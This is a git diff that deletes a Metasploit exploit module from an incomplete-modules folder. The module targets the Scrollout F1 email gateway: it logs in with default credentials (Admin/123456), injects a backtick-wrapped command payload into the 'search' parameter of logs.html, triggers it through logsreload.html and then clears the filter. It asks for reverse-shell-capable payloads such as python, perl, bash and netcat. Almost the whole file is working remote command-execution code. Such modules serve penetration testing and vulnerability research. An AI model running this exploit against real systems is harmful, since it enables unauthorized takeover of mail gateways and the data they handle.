diff --git a/unstable-modules/exploits/incomplete/unix/scrollout_loadlogs_exec.rb b/unstable-modules/exploits/incomplete/unix/scrollout_loadlogs_exec.rb deleted file mode 100644 index 2387f8b2fe..0000000000 --- a/unstable-modules/exploits/incomplete/unix/scrollout_loadlogs_exec.rb +++ /dev/null @@ -1,156 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info={}) - super(update_info(info, - 'Name' => 'Scrollout F1 Email Gateway loadLogs Command Execution', - 'Description' => %q{ - This module exploits a command execution vulnerability in Scrollout F1 - version 2012-10-03 which could be abused to allow authenticated users to - execute arbitrary commands under the context of the 'www-data' user. - The 'loadLogs' function in the 'logsreload.php' file calls 'shell_exec()' - with user controlled data from the 'search' parameter. - }, - 'References' => - [ - ['URL', 'http://itsecuritysolutions.org/2013-01-29-Scrollout-arbitrary-command-execution-vulnerability'], - ], - 'Author' => - [ - 'Brendan Coles ', # Discovery and exploit - ], - 'License' => MSF_LICENSE, - 'Privileged' => true, - 'Arch' => ARCH_CMD, - 'Platform' => 'unix', - 'Payload' => - { - 'BadChars' => "\x00", - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'python perl bash netcat-e', - }, - }, - 'Targets' => - [ - ['Automatic Targeting', { 'auto' => true }] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => "Jan 29 2013", - )) - - register_options([ - OptBool.new('SSL', [true, 'Use SSL', false]), - OptString.new('BasicAuthUser', [true, 'The Scrollout username', 'Admin']), - OptString.new('BasicAuthPass', [true, 'The Scrollout password', '123456']), - OptString.new('TARGETURI', [true, 'The path to the web application', '/']), - ], self.class) - end - - def check - - peer = "#{rhost}:#{rport}" - base = target_uri.path - base << '/' if base[-1, 1] != '/' - user = datastore['BasicAuthUser'] - - # send check - print_status("#{peer} - Authenticating as user '#{user}'") - begin - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => "#{base}", - }) - if res and res.code == 401 - print_error("#{peer} - Authentication failed") - return Exploit::CheckCode::Unknown - elsif res and res.code == 200 and res.body =~ /Scrollout F1<\/title>/ - return Exploit::CheckCode::Detected - end - return Exploit::CheckCode::Safe - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - print_error("#{peer} - Connection failed") - end - return Exploit::CheckCode::Unknown - - end - - def exploit - - @peer = "#{rhost}:#{rport}" - base = target_uri.path - base << '/' if base[-1, 1] != '/' - command = Rex::Text.uri_encode(payload.encoded) - - # send payload - print_status("#{@peer} - Sending payload (#{command.length} bytes)") - begin - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => "#{base}logs.html", - 'data' => "search=`#{command}`", - }) - if res and res.code == 200 - print_good("#{@peer} - Payload sent successfully") - elsif res and res.code == 401 - fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") - else - fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") - end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") - end - - # send payload trigger - print_status("#{@peer} - Sending payload trigger") - begin - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => "#{base}logsreload.html", - }) - if res and res.code == 200 - print_good("#{@peer} - Payload trigger sent successfully") - elsif res and res.code == 401 - fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") - else - fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Triggering payload failed") - end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") - end - - # cleanup - print_status("#{@peer} - Cleaning up config file (filter.cfg)") - begin - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => "#{base}logs.html", - 'data' => "search=", - }) - if res and res.code == 200 - print_good("#{@peer} - Cleaning completed successfully") - elsif res and res.code == 401 - fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") - else - fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Cleaning failed") - end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") - end - - end - -end -